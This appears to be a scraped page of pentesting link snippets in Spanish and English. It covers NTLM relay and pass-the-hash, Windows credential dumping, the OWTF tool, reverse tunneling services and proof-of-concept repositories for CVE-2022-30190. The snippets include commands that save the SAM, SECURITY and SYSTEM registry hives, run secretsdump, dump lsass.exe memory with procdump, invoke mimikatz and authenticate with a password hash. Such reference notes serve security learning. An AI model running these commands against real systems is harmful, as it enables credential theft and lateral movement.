https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0 Remediación Disabling LLMNR Open the Group Policy Editor in your version of Windows Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client Under DNS Client, make sure that “Turn OFF Multicast Name… Read more ›
https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/ Crackmapexec cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.localSMB 10.0.0.20 445 PC01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)SMB 10.0.0.20… Read more ›
https://pure.security/dumping-windows-credentials/ Registros C:> reg.exe save hklm\sam c:\temp\sam.saveC:> reg.exe save hklm\security c:\temp\security.saveC:> reg.exe save hklm\system c:\temp\system.save Password Hashes (Impacket) $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL Credenciales en memoria (Procdump) C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 C:> mimikatz.exe… Read more ›
Ref: https://meriemlarouim.medium.com/credentials-in-windows-and-how-to-dump-them-remotely-b5c315bb76f4 Example of an LM hash : aad3b435b51404eeaad3b435b51404ee PS : “aad3b435b51404eeaad3b435b51404ee” is the Null hash.
https://bitvijays.github.io/LFC-VulnerableMachines.html#ctf-series-vulnerable-machines
Página Official:https://owtf.github.io/ Instalación (recomendado usar Docker):https://owtf.readthedocs.io/en/develop/installation/methods.html#docker Primeros pasos (Autenticación):https://owtf.readthedocs.io/en/develop/usage/authentication.html
Un servicio de tunneling inverso sirve para publicar a internet algun servicio que tenemos en localhost mediante un proveedor: https://ngrok.com/ https://localhost.run/ https://www.cloudflare.com/es-es/products/argo-smart-routing/
https://github.com/JMousqueton/PoC-CVE-2022-30190 https://github.com/mr-r3b00t/msdt_pwn